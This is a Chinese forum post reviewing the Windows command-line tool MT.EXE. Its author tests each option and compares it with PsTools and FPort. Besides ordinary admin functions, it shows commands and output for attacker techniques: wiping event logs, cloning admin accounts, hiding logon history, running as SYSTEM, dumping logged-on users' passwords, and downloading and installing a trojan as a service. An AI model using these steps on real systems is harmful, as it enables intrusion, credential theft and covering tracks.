MT.EXE 中文使用教程
mt.exe下载<br />D:\>mt.exe <br />Usage: mt.exe <Opintion> <br />Opintion : <br /> -filter ---Change TCP/IP filter to on/off status. <br /> -addport ---Add ports to the filter' allowed portlist. <br /> -setport ---Set ports as the filter' allowed portlist. <br /> -nicinfo ---List TCP/IP interface info. <br /> -pslist ---List active processes. <br /> -pskill ---Kill a specified process. <br /> -dlllist ---List dlls of a specified process. <br /> -sysinfo ---List system info. <br /> -shutdown ---Shutdown system. <br /> -reboot ---Reboot system. <br /> -poweroff ---Turn off power. <br /> -logoff ---Logoff current user's session. <br /> -chkts ---Check Terminal Service info. <br /> -setupts ---Install Terminal Service. <br /> -remts ---Remove Terminal Service. <br /> -chgtsp ---Reset Terminal Service port. <br /> -clog ---Clean system log. <br /> -enumsrv ---List all services. <br /> -querysrv ---List detail info of a specified service. <br /> -instsrv ---Install a service. <br /> -cfgsrv ---Changes the configuration of a service. <br /> -remsrv ---Remove a specified service. <br /> -startsrv ---Start a specified service. <br /> -stopsrv ---Stop a specified service. <br /> -netget ---Download from http/ftp. <br /> -redirect ---Port redirect. <br /> -chkuser ---List all account、sid and anti clone. <br /> -clone ---Clone from admin to dest. <br /> -never ---Set account looks like never logged on. <br /> -killuser ---Del account. Even "guest" account. <br /> -su ---Run process as Local_System privilege. <br /> -findpass ---Show all logged on user's pass. <br /> -netstat ---List TCP connections. <br /> -killtcp ---Kill TCP connection. <br /> -psport ---Map ports to processes. <br /> -touch ---Set the file times for a specified file. <br /> -secdel ---Secure delete files and directory or zap free <br />pace. <br /> -regshell ---Enter a console registry editor. <br /> -chkdll ---Detect gina dll backdoor. <br />大家可以看见的是,.他的功能一共有34项,包含我们我们平时使用的大部分软件.下面我就来一项一项的测试,条件和能力有限,希望大家能够指出其中的不足. <br />一,MT.EXE –filter <br />Usage: <br />MT -filter <ON&line;OFF> ----Enabld&line;Disable TCP/IP Filter. <br />从上面的说明可以知道,这个是打开关闭TCP/IP筛选的,我们先来试一下,输入命令: <br />D:\>MT -FILTER on <br />Enable TCP/IP Filter successful! <br />这个时候我们看看试不试打开了TCP/IP筛选,打开网络连接选项,右键本地连接---Internet协议(TCP/IP)属性----高级---选项----TCP/IP筛选-----属性,我们看到的这样的情况,如图: <br />可以看见,我们已经启用了这个TCP/IP筛选,再次输入命令: <br />D:\>MT -FILTER off <br />Disable TCP/IP Filter successful! <br />查看属性: <br />有了这个工具,我们就不必那样的麻烦的点击鼠标了,一切都很简单. <br />二, D:\>mt -addport <br />Usage: <br />mt -addport <TCP&line;UDP> NIC PortList ----Add ports to the allowed portlist. <br /> Use "-nicinfo" get Nic number first. <br />从说明上面看,是增加端口列表中允许通讯的端口,还是和上面的一样,我们来看看这个功能是如何的强大: <br />五, -pslist ---List active processes. <br />列出活动进程,经常用PSTOOLS的很熟悉这个功能了,在这里,我将这个工具和pstools的工具相比较,看看他们的功能怎么样? <br />D:\>mt -pslist <br />PID Path <br />0 <br />4 l <br />464 \SystemRoot\System32\smss.exe <br />524 \??\C:\WINDOWS\system32\csrss.exe <br />548 \??\C:\WINDOWS\system32\winlogon.exe <br />592 C:\WINDOWS\system32\services.exe <br />604 C:\WINDOWS\system32\lsass.exe <br />780 C:\WINDOWS\system32\svchost.exe <br />844 C:\WINDOWS\System32\svchost.exe <br />876 C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe <br />932 C:\WINDOWS\System32\svchost.exe <br />960 C:\WINDOWS\System32\svchost.exe <br />1128 C:\WINDOWS\System32\alg.exe <br />1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />1188 D:\mysql\bin\mysqld-nt.exe <br />1280 C:\WINDOWS\System32\nvsvc32.exe <br />1728 C:\WINDOWS\Explorer.EXE <br />212 C:\WINDOWS\System32\ctfmon.exe <br />504 D:\Program Files\Microsoft Office\Office10\WINWORD.EXE <br />924 D:\Program Files\MYIE2\myie.exe <br />1348 C:\WINDOWS\System32\dllhost.exe <br />1516 C:\WINDOWS\System32\dllhost.exe <br />1856 C:\WINDOWS\System32\msdtc.exe <br />1356 C:\WINDOWS\System32\cmd.exe <br />1004 C:\WINDOWS\System32\conime.exe <br />1748 D:\Program Files\HyperSnap-DX 5\HprSnap5.exe <br />1272 D:\MT.exe <br />我们使用PSLIST得到的结果: <br />D:\hack>pslist <br />PsList v1.12 - Process Information Lister <br />Copyright (C) 1999-2000 Mark Russinovich <br />Systems Internals - http://www.sysinternals.com <br />Process information for LIN: <br />Name Pid Pri Thd Hnd Mem User Time Kernel Time Elapsed Time <br />Idle 0 0 1 0 20 0:00:00.000 0:40:22.453 0:00:00.000 <br />System 4 8 56 258 40 0:00:00.000 0:00:06.098 0:00:00.000 <br />smss 464 11 3 21 44 0:00:00.010 0:00:00.100 0:43:10.565 <br />csrss 524 13 11 416 3892 0:00:02.042 0:00:14.240 0:43:06.449 <br />winlogon 548 13 19 443 1044 0:00:01.171 0:00:01.882 0:43:04.185 <br />services 592 9 21 307 940 0:00:00.721 0:00:01.662 0:43:01.582 <br />lsass 604 9 19 304 1132 0:00:00.540 0:00:00.690 0:43:01.532 <br />svchost 780 8 8 255 824 0:00:00.200 0:00:00.160 0:42:58.687 <br />svchost 844 8 55 1214 5740 0:00:02.393 0:00:01.932 0:42:58.457 <br />StyleXPSer 876 8 2 38 416 0:00:00.110 0:00:00.070 0:42:58.357 <br />svchost 932 8 5 46 396 0:00:00.020 0:00:00.040 0:42:56.705 <br />svchost 960 8 7 90 204 0:00:00.060 0:00:00.040 0:42:56.244 <br />alg 1128 8 5 116 220 0:00:00.020 0:00:00.060 0:42:49.144 <br />inetinfo 1160 8 17 281 864 0:00:00.210 0:00:00.330 0:42:49.054 <br />mysqld-nt 1188 8 6 81 76 0:00:00.010 0:00:00.050 0:42:47.602 <br />nvsvc32 1280 8 3 74 92 0:00:00.090 0:00:00.160 0:42:45.378 <br />Explorer 1728 8 20 583 19548 0:00:11.436 0:00:27.519 0:42:37.607 <br />ctfmon 212 8 1 109 1596 0:00:00.340 0:00:01.031 0:42:26.982 <br />WINWORD 504 8 5 394 43428 0:01:04.072 0:00:25.757 0:41:26.194 <br />myie 924 8 9 312 3116 0:00:09.623 0:00:07.460 0:35:36.582 <br />dllhost 1348 8 23 240 1540 0:00:01.982 0:00:00.460 0:35:24.414 <br />dllhost 1516 8 15 200 784 0:00:00.190 0:00:00.230 0:35:22.912 <br />msdtc 1856 8 18 149 372 0:00:00.080 0:00:00.090 0:35:18.896 <br />cmd 1356 8 1 21 592 0:00:00.080 0:00:00.100 0:32:44.414 <br />conime 1004 8 1 25 664 0:00:00.050 0:00:00.030 0:32:42.652 <br />HprSnap5 1748 8 6 168 1648 0:00:01.932 0:00:03.414 0:18:38.798 <br />cmd 1548 8 1 20 1392 0:00:00.020 0:00:00.010 0:00:28.020 <br />pslist 1716 8 2 82 1672 0:00:00.030 0:00:00.050 0:00:00.400 <br />使用PULIST得到的结果: <br />E:\HACK>pulist <br />Process PID User <br />Idle 0 <br />System 4 <br />smss.exe 464 NT AUTHORITY\SYS <br />csrss.exe 524 NT AUTHORITY\SYS <br />winlogon.exe 548 NT AUTHORITY\SYS <br />services.exe 592 NT AUTHORITY\SYS <br />lsass.exe 604 NT AUTHORITY\SYS <br />svchost.exe 780 NT AUTHORITY\SYS <br />svchost.exe 844 NT AUTHORITY\SYS <br />StyleXPService.exe 876 NT AUTHORITY\SY <br />svchost.exe 932 <br />svchost.exe 960 <br />alg.exe 1128 <br />inetinfo.exe 1160 NT AUTHORITY\SYS <br />mysqld-nt.exe 1188 NT AUTHORITY\SYS <br />nvsvc32.exe 1280 NT AUTHORITY\SYS <br />Explorer.EXE 1728 LIN\lin <br />ctfmon.exe 212 LIN\lin <br />WINWORD.EXE 504 LIN\lin <br />MyIE.exe 924 LIN\lin <br />dllhost.exe 1348 <br />dllhost.exe 1516 NT AUTHORITY\SYS <br />msdtc.exe 1856 <br />cmd.exe 1356 LIN\lin <br />conime.exe 1004 LIN\lin <br />HprSnap5.exe 1748 LIN\lin <br />cmd.exe 1548 LIN\lin <br />pulist.exe 1788 LIN\lin <br />从上面的情况可以知道,输入MT还没有PSLIST功能的强大,能够列出Name,Pid,Pri,Thd Hnd,Mem,User Time,Kernel Time,Elapsed Time,但是较于PULIST,已经是很好的了,能够列出进程名和运行路径,已经能够满足我们平时的使用了. <br />六, D:\>mt -pskill <br />Usage: <br />mt -pskill <PID&line;ProcessName> <br />同样也是PSTOOLS的工具之一了,我们使用MyIE.exe这个软件作为测试,看看他们能不能杀死这个进程,首先是使用MT,通过上面的MT –PSLIST,我们知道MyIE.exe的PID值是924,于是输入: <br />D:\>mt -pskill 924 <br />Kill process sccuessful! <br />很快,MYIE就消失了,也就是被KILL了,再使用PSKILL.EXE,我们表示公平统一性,我们还是有PSLIST取得MYIE的PID值,重新打开MYIE,得到它的PID值为220,我们输入: <br />D:\hack>pskill 220 <br />PsKill v1.03 - local and remote process killer <br />Copyright (C) 2000 Mark Russinovich <br />http://www.sysinternals.com <br />Process 220 killed. <br />同样也是很快被KILL,说明MT和PSKILL的功能是一样的,使用MT也可以达到和PSKILL一样的效果. <br />我们发现MT一个比较弱的功能的就是没有和PSKILL一样支持网络功能,在PSKILL中可以通过pskill [\\RemoteComputer [-u Username]] <process Id or name> <br /> -u Specifies optional user name for login to <br /> remote computer. <br />杀死远程的计算机进程,当然,我们不可能指望MT也能有这样强大的功能,毕竟我们用的仅仅才只有40K. <br />七, D:\>mt -dlllist <br />Usage: <br />mt -dlllist <PID&line;ProcessName> <br />列出进程中相关的DLL文件,于这个相关功能的软件我没有找到,不过我们使用Windows优化大师,我们先来测试一下,这次我们选中的进程是StyleXPService.exe.还是使用MT –pslist得到其PID值876,输入: <br />D:\>mt -dlllist 876 <br />C:\Program Files\TGTSoft\StyleXP\StyleXPService.exe <br />C:\WINDOWS\System32\ntdll.dll <br />C:\WINDOWS\system32\kernel32.dll <br />C:\WINDOWS\system32\USER32.dll <br />C:\WINDOWS\system32\GDI32.dll <br />C:\WINDOWS\system32\ADVAPI32.dll <br />C:\WINDOWS\system32\RPCRT4.dll <br />C:\WINDOWS\system32\ole32.dll <br />C:\WINDOWS\system32\OLEAUT32.dll <br />C:\WINDOWS\system32\MSVCRT.DLL <br />C:\WINDOWS\system32\VERSION.dll <br />C:\WINDOWS\System32\SETUPAPI.dll <br />C:\WINDOWS\System32\NETAPI32.dll <br />C:\WINDOWS\System32\IMM32.DLL <br />C:\WINDOWS\System32\LPK.DLL <br />C:\WINDOWS\System32\USP10.dll <br />C:\WINDOWS\System32\UXTHEME.DLL <br />C:\WINDOWS\System32\rsaenh.dll <br />打开Windows优化大师,看看它得到的相关DLL文件是什么?如图: <br />使用MT得到的DLL相关文件和Windows优化大师的是一摸一样的,我们可以肯定使用MT绝对比使用Windows优化大师方便快捷. <br />八, mt –sysinfo <br />列出系统信息,还是使用Windows优化大师与之作比较,发现几乎没有任何的失误,可见准确性特别强的,由于页面的关系,数据不再展示. 这个功能和程序sysinfo.exe是一样的. <br />九, -shutdown ---Shutdown system. <br />-reboot ---Reboot system. <br /> -poweroff ---Turn off power. <br /> -logoff ---Logoff current user's session. <br />这4个命令就不说了,和系统工具shutdown不一样的是,输入之后没有任何的提示,直接关机,我已经试过了,幸亏还记得保存. <br />十, -chkts ---Check Terminal Service info. <br /> -setupts ---Install Terminal Service. <br /> -remts ---Remove Terminal Service. <br /> -chgtsp ---Reset Terminal Service port. <br />这4个命令是和Terminal相关的,由于没有安装服务器版本的系统,所以没有测试. <br />十一, -clog ---Clean system log. <br />用来清除记录,我们输入: <br />D:\>mt -clog <br />Usage: <br />mt -clog <app&line;sec&line;sys&line;all> ---Clean Application&line;Security&line;System&line;All logs. <br />从上面的可以看出,我们可以清除 “应用程序” “安全性” “系统”3个日志,我随便选择一个,用MT删除 “应用程序”日志,输入: <br />D:\>mt -clog app <br />Clean EventLog : Application successful! <br />打开事件查看器,如图, <br />可以看出日志已经被清空,不过MT并不能和小榕的Cleariislog相比,不能删除指定IP的日志,这个可能是yy3并没有考虑将这个工具用作那样的用途. <br />十二, -enumsrv ---List all services. <br />列出所有的服务,这个测试可能你的不同,因为我已经删除了很多的服务的了,为了精简系统和提升速度,还是来看看, <br />D:\>mt -enumsrv <br />Usage: <br />mt -enumsrv <SRV&line;DRV> ----List all Win32&line;Driver Service <br />D:\>mt -enumsrv srv <br />Num ServiceName DisplayName <br />0 Alerter Alerter <br />1 ALG Application Layer Gateway Service <br />2 AppMgmt Application Management <br />3 aspnet_state ASP.NET State Service <br />4 AudioSrv Windows Audio <br />(省略以下大部分的内容) <br />D:\>mt -enumsrv drv <br />Num ServiceName DisplayName <br />0 Abiosdsk Abiosdsk <br />1 abp480n5 abp480n5 <br />2 ACPI Microsoft ACPI Driver <br />3 ACPIEC ACPIEC <br />4 adpu160m adpu160m <br />5 aec Microsoft Kernel Acoustic Echo Canceller <br />6 AFD AFD 网络支持环境 <br />7 Aha154x Aha154x <br />8 aic78u2 aic78u2 <br />(省略以下大部分的内容) <br />实在是太多了,也不想说什么了,只有一个字----高. <br />十三, D:\>mt -querysrv <br />Usage: <br />mt -querysrv <ServiceName> ----Show detial info of a specifies service. <br />列出服务的详细信息,我们查看系统进程Alerter的信息,输入: <br />D:\>mt -querysrv Alerter <br />ServiceName: Alerter <br />Status: Stopped <br />ServiceType: Win32 Share Service <br />Start type: Demand Start <br />LogonID: NT AUTHORITY\LocalService <br />FilePath : C:\WINDOWS\System32\svchost.exe -k LocalService <br />DisplayName: Alerter <br />Dependency: LanmanWorkstation <br />Description: 通知所选用户和计算机有关系统管理级警报。如果服务停止,使用管理警 <br />报的程序将不会受到它们。如果此服务被禁用,任何直接依赖它的服务都将不能启动。Start type: Demand Start <br />LogonID: NT AUTHORITY\LocalService <br />FilePath : C:\WINDOWS\System32\alg.exe <br />DisplayName: Application Layer Gateway Service <br />Dependency: <br />Description: 为 Internet 连接共享和 Internet 连接防火墙提供第三方协议插件的支 <br />持 <br />实在是很清楚了,当然我们也可以使用mmc查看服务的详细信息,如图: <br />再一次看见这个参数了,上次已经忘记的了. <br />十四, -instsrv ---Install a service. <br /> -cfgsrv ---Changes the configuration of a service. <br /> -remsrv ---Remove a specified service. <br /> -startsrv ---Start a specified service. <br /> -stopsrv ---Stop a specified service. <br />这写命令四和服务相关的,放在一起测试了,服务程序选择了冰河的服务端server.exe,我现在要作的是将这个工具作为服务安装,然后改变配置,开始服务,停止服务等,输入: <br />十五, D:\>mt -netget <br />Usage: <br /> mt -netget <url> <filename to saved> ---Download from http/ftp. <br />这个工具很是实用,直到几个月前,还在安全焦点的论坛上面看见有人需要这样的工具,不过那个时候他们提供的是VBS文件,可惜我现在已经找不到那些代码了,在DOS下下载软件的东西,特别的方便.打建IIS服务器,把server.exe文件放置在根目录下面,在DOS下面输入 <br />D:\>mt -netget http://192.168.0.1/server.exe f:\server.exe <br />Download File from http://192.168.0.1/server.exe to f:\server.exe. <br />Download completed 272992 bytes ...... <br />Downloaded 266.6KB at 266 dot 6KB/S in 0sec. <br />File <f:\server.exe> TotalByte : 266 KB. <br />将下载回来的server.exe文件保存在F盘server.exe文件. <br />十六, D:\>mt -redirect <br />Usage: <br />mt -redirect <TargetIP> <TargetPort> <ListenPort> ----TCP port redirector. <br />这个功能和FPIPE是一样的,实现端口转换,我们这样测试,将192.168.0.1主机的80端口转化为81端口,这样输入: <br />D:\>mt -redirect 192.168.0.1 80 81 <br /><br />------Waiting Connection----- <br />然后另外开一个CMD,telnet到192.168.0.1的81端口,看到这样的情况,第一个CMD显示出了连接的信息, <br />D:\>mt -redirect 192.168.0.1 80 81 <br /><br />------Waiting Connection----- <br /><br />Accept client==>192.168.0.1:3027 <br />connect to 192.168.0.1 80 success! <br />Thread 1988 recv 2 bytes. <br />Thread 1988 send 2 bytes. <br />Thread 1988 recv 2 bytes. <br />Thread 1988 send 2 bytes. <br />Thread 316 recv 224 bytes. <br />Thread 316 send 224 bytes. <br />而第二个CMD也显示出了我们需要得到的信息: <br />HTTP/1.1 400 Bad Request <br />Server: Microsoft-IIS/5.1 <br />Date: Wed, 19 May 2004 13:28:53 GMT <br />Content-Type: text/html <br />Content-Length: 87 <br /><html><head><title>Error</title></head><body>The parameter is incorrect. </body> <br /></html> <br />不过这个功能有一点不稳定,也就是说,有时候可以,有时候又不可以,这次的成功也是重新启动以后才出现的,相对于FPIPE,是方便了很多了,置于FPIPE.exe的用法,实在是让我头痛了几天. <br />17, D:\>mt -clone <br />Usage: <br />mt -clone <SourUser> <DestUser> <br />克隆账号,有点象小榕的cloneuser,测试一下,新建一个用户yun,现在我要将管理员账号lin克隆为账号yun,输入: <br />D:\hack>mt -clone lin yun <br />Fail to Open SAM Key, 操作成功完成。 <br />D:\>mt -clone lin yun <br />Fail to Open SAM Key, 操作成功完成。 <br />可能是不支持XP系统,虽然提示说操作成功,可是事实上,使用yun登陆的时候,还是没有成功,可能也是有其缺陷或者是我自己操作失败吧. <br />18, D:\>mt -never <br /> -never ---Set account looks like never logged on. <br />它可以设置使用户看起来从来没有登陆过,在我的系统里面有2个用户,一个是管理员lin,另外一个是公用的帐户316,现在我把316设置为从不登陆的状态.输入 <br />D:\>mt -never 316 <br />Require System Privilege.提示没有权限,于是 <br />D:\>mt -su <br />打开新的CMD窗口,输入 <br />Microsoft Windows XP [版本 5.1.2600] <br />(C) 版权所有 1985-2001 Microsoft Corp. <br />C:\WINDOWS\system32>d: <br />D:\>mt -never 316 <br />Fail to Set F Value. <br />D:\>net user 316 <br />用户名 316 <br />全名 316 <br />注释 <br />用户的注释 <br />国家(地区)代码 000 (系统默认值) <br />帐户启用 Yes <br />帐户到期 从不 <br />上次设置密码 2004/5/19 下午 08:22 <br />密码到期 从不 <br />密码可更改 2004/5/19 下午 08:22 <br />需要密码 Yes <br />用户可以更改密码 Yes <br />允许的工作站 All <br />登录脚本 <br />用户配置文件 <br />主目录 <br />上次登录 从不 <br />可允许的登录小时数 All <br />本地组成员 *Users <br />全局组成员 *None <br />命令成功完成。 <br /><br />D:\> <br />可以看出来已经修改成功了,虽然显示的是Fail to Set F Value.,但还是成功了.这个功能和never.exe是一样的,只是将特定的的帐户上回登陆时间改为帐户从来没有登陆上过系统. <br />成功条件:你要有local system权限 <br />18, -killuser ---Del account. Even "guest" account. <br />删除用户,输入D:\>mt -killuser ziqi <br />Kill User: ziqi Success! <br />这个功能有一点问题,输入提示已经删除了,可是然后事实上,这个用户并没有删除,我们输入 <br />D:\>net user <br />\\LIN 的用户帐户 <br />------------------------------------------------------------------------------- <br />316 Administrator ASPNET <br />Guest HelpAssistant IUSR_IMAGE <br />IWAM_IMAGE lin SUPPORT_388945a0 <br />ziqi <br />命令成功完成。 <br />还是能够看见ziqi的账号,打开控制面板,用户账号,还是能看见这个用户的身影: <br />但是如果我们以下面这种方式登陆,也就是先运行MT –su得到系统最高权限,在这个CMD下,我们就可以删除账号了,同时也可以删除GUEST用户,虽然我还没有激活这个账号,不知道是什么原因,因为我本身登陆的就已经是administrator组了.删除GUEST的过程: <br />D:\>mt -killuser guest <br />Kill User: guest Success! <br />D:\>net user <br />\\ 的用户帐户 <br />------------------------------------------------------------------------------- <br />316 Administrator ASPNET <br />HelpAssistant IUSR_IMAGE IWAM_IMAGE <br />lin SUPPORT_388945a0 yun <br />命令运行完毕,但发生一个或多个错误。 <br />19, -su ---Run process as Local_System privilege. <br />以系统特权运行进程,在管理员登陆的情况下输入MT –su,马上弹出另外一CMD窗口,在这个窗口中,可以做任何我们想做的事情,这个也是系统的最高权限了. <br />20 -regshell ---Enter a console registry editor. <br />以CMD的方式编辑注册表,输入在CMD下不是很方便,不过有时候也是很使用的,输入: <br />D:\>mt -regshell <br />HKLM\>dir <br /><SubKey> HARDWARE <br /><SubKey> SAM <br /><SubKey> SECURITY <br /><SubKey> SOFTWARE <br /><SubKey> SYSTEM <br /> Total: 5 SubKey, 0 Value. <br />HKLM\>quitreg <br />D:\> <br />和真实环境没有什么区别. <br />21, -netstat ---List TCP connections. <br />列出所有的TCP连接,我让192.168.0.2打开IE,访问192.168.0.1的主页,然后输入: <br />D:\>mt -netstat <br />Num LocalIP Port RemoteIP PORT Status <br />11 192.168.0.1 80 192.168.0.2 1050 Established <br />如果使用的是系统自带的netstat,得到的结果是一样的: <br />D:\>netstat <br />Active Connections <br />Proto Local Address Foreign Address State <br />TCP LIN:http 192.168.0.2:1050 ESTABLISHED <br />只是使用MT能够更直接,更容易理解,比如使用端口80代替使用协议HTTP. <br />22, D:\>mt -killtcp <br />Usage: <br />mt -killtcp <ConnectionNum> ----Kill a specifies TCP connection. <br />和上面的搭配用,如果先KILL192.168.0.2对本机(192.168.0.1)的连接,可以输入: <br />D:\>mt -killtcp 11 <br />Waiting connection to be close now. <br />这个时候再输入: <br />D:\>mt -netstat <br />Num LocalIP Port RemoteIP PORT Status <br />D:\> <br />已经看不到有它的连接了. <br />23, -chkdll ---Detect gina dll backdoor. <br />检查gina木马后门,这个问题以前是很流行了,所以也被考虑进来了,使用很简单: <br />D:\>mt -chkdll <br />GinaDll not found. <br />Winlogon Notification Package Dll: <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain <br />crypt32.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cryptnet <br />cryptnet.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cscdll <br />cscdll.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp <br />wlnotify.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\Schedule <br />wlnotify.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\sclgntfy <br />sclgntfy.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SensLogn <br />WlNotify.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\termsrv <br />wlnotify.dll <br />HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\wlballoon <br />wlnotify.dll <br />Please make sure if they were backdoors. <br />如果我安装了GINA木马,会出现这样的情况: <br />D:\>mt -chkdll <br />GinaDll exist: <br /> HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDll <br />c:\windows\system32\ntshellgina.dll <br />很快就被检测出来了,实在是很方便,呵呵,其实我那个DLL文件早就被KILL了,只是修改了一下注册表而已,不过也显示了这个工具的强大性. <br />24, -psport ---Map ports to processes. <br />显示进程的端口,这个功能和哪个工具的功能一样的呢,呵呵,忘记了,对了是FPORT.EXE,呵呵,很久没有用了,还是来看看他们有什么不同的地方: <br />D:\>mt -psport <br />Proto Listen PID Path <br />TCP 0.0.0.0:80 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />TCP 0.0.0.0:135 780 C:\WINDOWS\system32\svchost.exe <br />TCP 0.0.0.0:443 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />TCP 0.0.0.0:1025 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />TCP 0.0.0.0:1026 4 <br />TCP 0.0.0.0:3025 960 C:\WINDOWS\System32\svchost.exe <br />TCP 0.0.0.0:3027 1252 C:\WINDOWS\System32\msdtc.exe <br />TCP 0.0.0.0:3306 1176 D:\mysql\bin\mysqld-nt.exe <br />TCP 127.0.0.1:3001 1120 C:\WINDOWS\System32\alg.exe <br />TCP 127.0.0.1:3002 844 C:\WINDOWS\System32\svchost.exe <br />TCP 127.0.0.1:3003 844 C:\WINDOWS\System32\svchost.exe <br />TCP 192.168.0.1:139 4 <br />TCP 192.168.0.1:3011 4 <br />UDP 0.0.0.0:500 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />UDP 0.0.0.0:3456 780 C:\WINDOWS\system32\svchost.exe <br />UDP 127.0.0.1:3020 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />UDP 127.0.0.1:3026 1160 C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />UDP 192.168.0.1:137 4 <br />UDP 192.168.0.1:138 960 C:\WINDOWS\System32\svchost.exe <br />使用FPORT.EXE得到下面的结果 <br />E:\HACK>fport /ap <br />FPort v2.0 - TCP/IP Process to Port Mapper <br />Copyright 2000 by Foundstone, Inc. <br />http://www.foundstone.com <br />Pid Process Port Proto Path <br />1120 -> 3001 TCP <br />960 -> 3025 TCP <br />1252 -> 3027 TCP <br />4 System -> 1026 TCP <br />4 System -> 139 TCP <br />4 System -> 3011 TCP <br />1160 inetinfo -> 1025 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />1160 inetinfo -> 443 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />1160 inetinfo -> 80 TCP C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />844 svchost -> 3002 TCP C:\WINDOWS\System32\svchost.exe <br />844 svchost -> 3003 TCP C:\WINDOWS\System32\svchost.exe <br />780 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe <br />1176 mysqld-nt -> 3306 TCP D:\mysql\bin\mysqld-nt.exe <br />960 -> 138 UDP <br />4 System -> 137 UDP <br />1160 inetinfo -> 3020 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />1160 inetinfo -> 3026 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />1160 inetinfo -> 500 UDP C:\WINDOWS\System32\inetsrv\inetinfo.exe <br />780 svchost -> 3456 UDP C:\WINDOWS\system32\svchost.exe <br />基本上差不多了,不过感觉好像FPORT更加强大一点,因为我现在在FPORT中用了参数,为了使2个更容易对比一些. <br />这里还有一个比较好的软件,使GUI的,抓图下来如下: <br />24, -touch ---Set the file times for a specified file. <br />查看文件修改时间,下载或者COPY,转移会改变文件的最后修改时间,而使用这个命令可以查看文件的最后修改时间,举个例子,我们现在看到的文件mt.exe,如图, <br />而事实上,我们使用下面的命令: <br />D:\>mt -touch mt1.exe <br />Set FileTime Successful. <br />CreationTime : 07/10/2002 <br />LastAccessTime : 19/05/2004 <br />LastWriteTime : 07/10/2002 <br />可以知道其创建时间不使2004年5月19日,而是CreationTime : 07/10/2002,相信这个也就使yy3写这个程序的时间了.与这个相关的软件有偷touch.exe,可以我电脑里面的这个文件已经本病毒破坏了。 <br />25, -chkuser ---List all account、sid and anti clone. <br />这个功能,测试不了,虽然说使列出所有的用户,SID和反克隆设置,但是,一旦输入,就有错误发生 <br />26, -findpass ---Show all logged on user's pass. <br />得到所有登陆用户的密码,由于这个命令是For NT/2K only.,所以我在客户机上面测试这个功能,输入,很容易就得到了密码: <br />G:\WINNT\system32>mt -findpass <br />mt -findpass <br />The logon information : <br /> Domain : 316-2AS8L1B1FL5 <br /> Username : Administrator <br /> Password : winyaj <br />G:\WINNT\system32> <br />这个比findpass.exe还方便一些,不需要知道用户进程的PID值. <br />后记:MT确实是一个很不错的工具,它能够让我们很容易的做很多事情,而不用到处去找相关的软件, <br />很多朋友都问在哪里可以下载?事实上现在在网络上面是找不到这个程序的,因为这个程序是yy3给我测试的,没经过他的同意,我也不敢随便发布在网络上面。所以想要的朋友麻烦留下你们的E-mail信箱,我会给没一个朋友发一份,同时也希望能帮忙测试,发现一些BUG什么的。还有就是不要随便乱发就是了,自己用真的很不错的,到时候yy3怪下来我真的恐怕承受不起。
頁:
[1]